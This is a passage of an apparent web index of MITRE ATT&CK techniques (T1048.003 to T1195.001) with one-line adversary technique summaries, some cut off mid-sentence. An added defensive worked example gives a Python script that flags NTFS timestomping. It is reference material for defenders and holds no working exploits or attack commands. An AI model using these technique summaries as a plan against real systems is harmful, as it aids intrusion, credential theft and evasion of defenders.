Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.

Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.

System Network Connections Discovery (T1049)

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

New Service (T1050)

When operating systems boot up, they can start programs or applications called services that perform background system functions.

Shared Webroot (T1051)

This technique has been deprecated and should no longer be used.

Exfiltration Over Physical Medium (T1052)

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive.

Exfiltration over USB (T1052.001)

Adversaries may attempt to exfiltrate data over a USB connected physical device.

Scheduled Task/Job (T1053)

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

At (Linux) (T1053.001)

Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code.

At (T1053.002)

Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code.

Cron (T1053.003)

Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.

Launchd (T1053.004)

This technique is deprecated due to inaccurate usage.

Scheduled Task (T1053.005)

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.

Systemd Timers (T1053.006)

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code.

Container Orchestration Job (T1053.007)

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code.

Indicator Blocking (T1054)

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.

Process Injection (T1055)

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

Dynamic-link Library Injection (T1055.001)

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.

Portable Executable Injection (T1055.002)

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.

Thread Execution Hijacking (T1055.003)

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.

Asynchronous Procedure Call (T1055.004)

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.

Thread Local Storage (T1055.005)

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.

Ptrace System Calls (T1055.008)

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.

Proc Memory (T1055.009)

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges.

Extra Window Memory Injection (T1055.011)

Adversaries may inject malicious code into processes via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges.

Process Hollowing (T1055.012)

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.

Process Doppelgänging (T1055.013)

Adversaries may inject malicious code into processes via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges.

VDSO Hijacking (T1055.014)

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges.

ListPlanting (T1055.015)

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.

Input Capture (T1056)

Adversaries may use methods of capturing user input to obtain credentials or collect information.

Keylogging (T1056.001)

Adversaries may log user keystrokes to intercept credentials as the user types them.

GUI Input Capture (T1056.002)

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt.

Web Portal Capture (T1056.003)

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service.

Credential API Hooking (T1056.004)

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials.

Process Discovery (T1057)

Adversaries may attempt to get information about running processes on a system.

Service Registry Permissions Weakness (T1058)

Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.

Command and Scripting Interpreter (T1059)

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

PowerShell (T1059.001)

Adversaries may abuse PowerShell commands and scripts for execution.

AppleScript (T1059.002)

Adversaries may abuse AppleScript for execution.

Windows Command Shell (T1059.003)

Adversaries may abuse the Windows command shell for execution.

Unix Shell (T1059.004)

Adversaries may abuse Unix shell commands and scripts for execution.

Visual Basic (T1059.005)

Adversaries may abuse Visual Basic (VB) for execution.

Python (T1059.006)

Adversaries may abuse Python commands and scripts for execution.

JavaScript (T1059.007)

Adversaries may abuse various implementations of JavaScript for execution.

Network Device CLI (T1059.008)

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads.

Cloud API (T1059.009)

Adversaries may abuse cloud APIs to execute malicious commands.

AutoHotKey & AutoIT (T1059.010)

Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts.

Lua (T1059.011)

Adversaries may abuse Lua commands and scripts for execution.

Registry Run Keys / Startup Folder (T1060)

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

Graphical User Interface (T1061)

This technique has been deprecated.

Hypervisor (T1062)

This technique has been deprecated and should no longer be used.

Security Software Discovery (T1063)

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system.

Scripting (T1064)

This technique has been deprecated.

Uncommonly Used Port (T1065)

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

Indicator Removal from Tools (T1066)

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.

Bootkit (T1067)

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).

Exploitation for Privilege Escalation (T1068)

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.

Permission Groups Discovery (T1069)

Adversaries may attempt to discover group and permission settings.

Local Groups (T1069.001)

Adversaries may attempt to find local system groups and permission settings.

Domain Groups (T1069.002)

Adversaries may attempt to find domain-level groups and permission settings.

Cloud Groups (T1069.003)

Adversaries may attempt to find cloud groups and permission settings.

Indicator Removal (T1070)

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses.

Clear Windows Event Logs (T1070.001)

Adversaries may clear Windows Event Logs to hide the activity of an intrusion.

Clear Linux or Mac System Logs (T1070.002)

Adversaries may clear system logs to hide evidence of an intrusion.

Clear Command History (T1070.003)

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

File Deletion (T1070.004)

Adversaries may delete files left behind by the actions of their intrusion activity.

Network Share Connection Removal (T1070.005)

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

Timestomp (T1070.006)

Adversaries may modify file time attributes to hide new files or changes to existing files.

Clear Network Connection History and Configurations (T1070.007)

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations.

Clear Mailbox Data (T1070.008)

Adversaries may modify mail and mail application data to remove evidence of their activity.

Clear Persistence (T1070.009)

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity.

Relocate Malware (T1070.010)

Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses.

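Worked example for T1070.006, added here and not part of the ATT&CK entry or this playbook tool. An NTFS file record carries two timestamp sets: $STANDARD_INFORMATION (what Explorer shows and what SetFileTime() can rewrite) and $FILE_NAME (updated only by the kernel). Two classic timestomp indicators are a $STANDARD_INFORMATION creation time earlier than the $FILE_NAME creation time, and $STANDARD_INFORMATION values whose 100 ns sub-second part is all zero, which is what tools that set times at one-second granularity leave behind. The records below are constructed, in the ISO-8601 form with seven fractional digits that an MFT parser would export.

```python
"""Timestomp triage from NTFS timestamps (added example, not from this page)."""
from datetime import datetime, timezone

TICKS_PER_SECOND = 10_000_000  # NTFS FILETIME resolution is 100 ns


def to_ticks(stamp: str) -> int:
    """'YYYY-MM-DDTHH:MM:SS.fffffffZ' -> 100 ns ticks since the Unix epoch."""
    base, _, frac = stamp.rstrip("Z").partition(".")
    whole = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
    return int(whole.timestamp()) * TICKS_PER_SECOND + int((frac + "0000000")[:7])


# Constructed MFT export: si_* = $STANDARD_INFORMATION, fn_* = $FILE_NAME.
RECORDS = [
    {"path": r"C:\Windows\System32\drivers\etc\hosts",
     "si_created": "2021-03-04T09:12:31.1234567Z", "si_modified": "2023-01-10T14:00:02.5512345Z",
     "fn_created": "2021-03-04T09:12:31.1234567Z"},
    {"path": r"C:\Windows\System32\svchost32.dll",
     "si_created": "2019-07-22T10:00:00.0000000Z", "si_modified": "2019-07-22T10:00:00.0000000Z",
     "fn_created": "2024-05-01T03:14:07.9921004Z"},
    {"path": r"C:\Users\bob\notes.txt",
     "si_created": "2024-02-02T08:00:00.0000000Z", "si_modified": "2024-02-02T08:00:00.0000000Z",
     "fn_created": "2024-02-02T08:00:00.0000000Z"},
]


def check_record(rec: dict) -> list:
    """Return the timestomp indicators that apply to one file record."""
    si_c, si_m, fn_c = (to_ticks(rec[k]) for k in ("si_created", "si_modified", "fn_created"))
    findings = []
    if si_c < fn_c:
        # The kernel set FN at creation; SI claiming an earlier birth was written afterwards.
        findings.append("si_before_fn_created")
    si_zero = si_c % TICKS_PER_SECOND == 0 and si_m % TICKS_PER_SECOND == 0
    if si_zero and fn_c % TICKS_PER_SECOND != 0:
        findings.append("si_zero_subseconds")
    elif si_zero:
        # FN is zero too: could be a copy from FAT or an archive extraction, weaker signal.
        findings.append("zero_subseconds_both")
    return findings


def triage(records) -> dict:
    """path -> findings, for every record with at least one indicator."""
    out = {}
    for rec in records:
        findings = check_record(rec)
        if findings:
            out[rec["path"]] = findings
    return out


if __name__ == "__main__":
    for path, findings in triage(RECORDS).items():
        print(path, findings)
```

Two caveats when reading the output: a rename or move rewrites $FILE_NAME from the $STANDARD_INFORMATION values of that moment, so the first check only holds for files that kept their name; and $STANDARD_INFORMATION can be rewritten back to a fully plausible value by a tool that copies the sub-second part from a neighbouring file, in which case the $LogFile and USN journal are the remaining evidence.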
Application Layer Protocol (T1071)

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic.

Web Protocols (T1071.001)

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.

File Transfer Protocols (T1071.002)

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic.

Mail Protocols (T1071.003)

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic.

DNS (T1071.004)

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.

Publish/Subscribe Protocols (T1071.005)

Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic.

Software Deployment Tools (T1072)

Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network.

DLL Side-Loading (T1073)

Programs may specify DLLs that are loaded at runtime.

Data Staged (T1074)

Adversaries may stage collected data in a central location or directory prior to Exfiltration.

Local Data Staging (T1074.001)

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration.

Remote Data Staging (T1074.002)

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration.

Pass the Hash (T1075)

Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password.

Remote Desktop Protocol (T1076)

Remote desktop is a common feature in operating systems.

Windows Admin Shares (T1077)

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions.

Valid Accounts (T1078)

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Default Accounts (T1078.001)

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Domain Accounts (T1078.002)

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Local Accounts (T1078.003)

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Cloud Accounts (T1078.004)

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Multilayer Encryption (T1079)

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

Taint Shared Content (T1080)

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories.

Credentials in Files (T1081)

Adversaries may search local file systems and remote file shares for files containing passwords.

System Information Discovery (T1082)

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

File and Directory Discovery (T1083)

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

Windows Management Instrumentation Event Subscription (T1084)

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.

Rundll32 (T1085)

The rundll32.exe program can be called to execute an arbitrary binary.

PowerShell (T1086)

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.

Account Discovery (T1087)

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment.

Local Account (T1087.001)

Adversaries may attempt to get a listing of local system accounts.

Domain Account (T1087.002)

Adversaries may attempt to get a listing of domain accounts.

Email Account (T1087.003)

Adversaries may attempt to get a listing of email addresses and accounts.

Cloud Account (T1087.004)

Adversaries may attempt to get a listing of cloud accounts.

Bypass User Account Control (T1088)

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation.

Disabling Security Tools (T1089)

Adversaries may disable security tools to avoid possible detection of their tools and activities.

Proxy (T1090)

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.

Internal Proxy (T1090.001)

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment.

External Proxy (T1090.002)

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.

Multi-hop Proxy (T1090.003)

Adversaries may chain together multiple proxies to disguise the source of malicious traffic.

Domain Fronting (T1090.004)

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.

Replication Through Removable Media (T1091)

View on ATT&CK

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.

More Info

In Playbook

Communication Through Removable Media (T1092)

View on ATT&CK

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.

More Info

In Playbook

Process Hollowing (T1093)

View on ATT&CK

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code.

More Info

In Playbook

Custom Command and Control Protocol (T1094)

View on ATT&CK

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.

More Info

In Playbook

Non-Application Layer Protocol (T1095)
Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network.

NTFS File Attributes (T1096)
Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.

Pass the Ticket (T1097)
Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password.

Account Manipulation (T1098)
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems.

Additional Cloud Credentials (T1098.001)
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

Additional Email Delegate Permissions (T1098.002)
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

Additional Cloud Roles (T1098.003)
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant.

SSH Authorized Keys (T1098.004)
Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host.

Device Registration (T1098.005)
Adversaries may register a device to an adversary-controlled account.

Additional Container Cluster Roles (T1098.006)
An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system.

Additional Local or Domain Groups (T1098.007)
An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.

Timestomp (T1099)
Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities.

Web Shell (T1100)
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network.

Security Support Provider (T1101)
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start.

Web Service (T1102)
Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.

Dead Drop Resolver (T1102.001)
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure.

Bidirectional Communication (T1102.002)
Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel.

One-Way Communication (T1102.003)
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel.

AppInit DLLs (T1103)
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.

Multi-Stage Channels (T1104)
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions.

Ingress Tool Transfer (T1105)
Adversaries may transfer tools or other files from an external system into a compromised environment.

Native API (T1106)
Adversaries may interact with the native OS application programming interface (API) to execute behaviors.

File Deletion (T1107)
Adversaries may delete files left behind by the actions of their intrusion activity.

Redundant Access (T1108)
This technique has been deprecated.

Component Firmware (T1109)
Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS.

Brute Force (T1110)
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.

Password Guessing (T1110.001)
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.

Password Cracking (T1110.002)
Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained.

Password Spraying (T1110.003)
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

Credential Stuffing (T1110.004)
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap.

Multi-Factor Authentication Interception (T1111)
Adversaries may target multi-factor authentication (MFA) mechanisms, (i.

Modify Registry (T1112)
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Screen Capture (T1113)
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.

Email Collection (T1114)
Adversaries may target user email to collect sensitive information.

Local Email Collection (T1114.001)
Adversaries may target user email on local systems to collect sensitive information.

Remote Email Collection (T1114.002)
Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.

Email Forwarding Rule (T1114.003)
Adversaries may set up email forwarding rules to collect sensitive information.

Clipboard Data (T1115)
Adversaries may collect data stored in the clipboard from users copying information within or between applications.

Code Signing (T1116)
Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.

Regsvr32 (T1117)
Regsvr32.

InstallUtil (T1118)
InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .

Automated Collection (T1119)
Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Peripheral Device Discovery (T1120)
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

Regsvcs/Regasm (T1121)
Regsvcs and Regasm are Windows command-line utilities that are used to register .

Component Object Model Hijacking (T1122)
The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.

Audio Capture (T1123)
An adversary can leverage a computer's peripheral devices (e.

System Time Discovery (T1124)
An adversary may gather the system time and/or time zone settings from a local or remote system.

Video Capture (T1125)
An adversary can leverage a computer's peripheral devices (e.

Network Share Connection Removal (T1126)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

Trusted Developer Utilities Proxy Execution (T1127)
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads.

MSBuild (T1127.001)
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility.

ClickOnce (T1127.002)
Adversaries may use ClickOnce applications (.

Netsh Helper DLL (T1128)
Netsh.

Shared Modules (T1129)
Adversaries may execute malicious payloads via loading shared modules.

Install Root Certificate (T1130)
Root certificates are used in public key cryptography to identify a root certificate authority (CA).

Authentication Package (T1131)
Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start.

Data Encoding (T1132)
Adversaries may encode data to make the content of command and control traffic more difficult to detect.

Standard Encoding (T1132.001)
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect.

Non-Standard Encoding (T1132.002)
Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect.

External Remote Services (T1133)
Adversaries may leverage external-facing remote services to initially access and/or persist within a network.

Access Token Manipulation (T1134)
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.

Token Impersonation/Theft (T1134.001)
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls.

Create Process with Token (T1134.002)
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls.

Make and Impersonate Token (T1134.003)
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls.

Parent PID Spoofing (T1134.004)
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.

SID-History Injection (T1134.005)
Adversaries may use SID-History Injection to escalate privileges and bypass access controls.

Network Share Discovery (T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.

Create Account (T1136)
Adversaries may create an account to maintain access to victim systems.

Local Account (T1136.001)
Adversaries may create a local account to maintain access to victim systems.

Domain Account (T1136.002)
Adversaries may create a domain account to maintain access to victim systems.

Cloud Account (T1136.003)
Adversaries may create a cloud account to maintain access to victim systems.

Office Application Startup (T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups.

Office Template Macros (T1137.001)
Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.

Office Test (T1137.002)
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

Outlook Forms (T1137.003)
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system.

Outlook Home Page (T1137.004)
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.

Outlook Rules (T1137.005)
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system.

Add-ins (T1137.006)
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Application Shimming (T1138)
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Bash History (T1139)
Bash keeps track of the commands users type on the command-line with the "history" utility.

Deobfuscate/Decode Files or Information (T1140)
Adversaries may use [Obfuscated Files or Information](https://attack.

Input Prompt (T1141)
When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.

Keychain (T1142)
Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos.

Hidden Window (T1143)
Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users.

Gatekeeper Bypass (T1144)
In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.

Private Keys (T1145)
Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.

Clear Command History (T1146)
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Hidden Users (T1147)
Every user account in macOS has a userID associated with it.

HISTCONTROL (T1148)
The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.

LC_MAIN Hijacking (T1149)
This technique has been deprecated and should no longer be used.

Plist Modification (T1150)
Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services.

Space after Filename (T1151)
Adversaries can hide a program's true filetype by changing the extension of a file.

Launchctl (T1152)
Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself.

Source (T1153)
This technique has been deprecated and should no longer be used.

Trap (T1154)
The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals.

AppleScript (T1155)
macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC).

Malicious Shell Modification (T1156)
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.

Dylib Hijacking (T1157)
macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.

Hidden Files and Directories (T1158)
To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file.

Launch Agent (T1159)
Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware).

Launch Daemon (T1160)
Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization.

LC_LOAD_DYLIB Addition (T1161)
Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded.

Login Item (T1162)
MacOS provides the option to list specific applications to run when a user logs in.

Rc.common (T1163)
During the boot process, macOS executes <code>source /etc/rc.

Re-opened Applications (T1164)
Starting in Mac OS X 10.

Startup Items (T1165)
Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items).

Setuid and Setgid (T1166)
When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page).

Securityd Memory (T1167)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.

Local Job Scheduling (T1168)
On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.

Sudo (T1169)
The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals.

Mshta (T1170)
Mshta.

LLMNR/NBT-NS Poisoning and Relay (T1171)
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification.

Domain Fronting (T1172)
Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.

Dynamic Data Exchange (T1173)
Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications.

Password Filter DLL (T1174)
Windows password filters are password policy enforcement mechanisms for both domain and local accounts.

Component Object Model and Distributed COM (T1175)
This technique has been deprecated.

Browser Extensions (T1176)
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems.

LSASS Driver (T1177)
The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain.

SID-History Injection (T1178)
The Windows security identifier (SID) is a unique value that identifies a user or group account.

Hooking (T1179)
Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources.

Screensaver (T1180)
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .

Extra Window Memory Injection (T1181)
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulates appearance and behavior (via windows procedures, which are functions that handle input/output of data).

AppCert DLLs (T1182)
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec.

Image File Execution Options Injection (T1183)
Image File Execution Options (IFEO) enable a developer to attach a debugger to an application.

SSH Hijacking (T1184)
Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems.

Browser Session Hijacking (T1185)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

Process Doppelgänging (T1186)
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.

Forced Authentication (T1187)
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

Multi-hop Proxy (T1188)
To disguise the source of malicious traffic, adversaries may chain together multiple proxies.

Drive-by Compromise (T1189)
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.

Exploit Public-Facing Application (T1190)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

CMSTP (T1191)
The Microsoft Connection Manager Profile Installer (CMSTP.

Spearphishing Link (T1192)
Spearphishing with a link is a specific variant of spearphishing.

Spearphishing Attachment (T1193)
Spearphishing attachment is a specific variant of spearphishing.

Spearphishing via Service (T1194)
Spearphishing via service is a specific variant of spearphishing.

Supply Chain Compromise (T1195)
Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Compromise Software Dependencies and Development Tools (T1195.001)
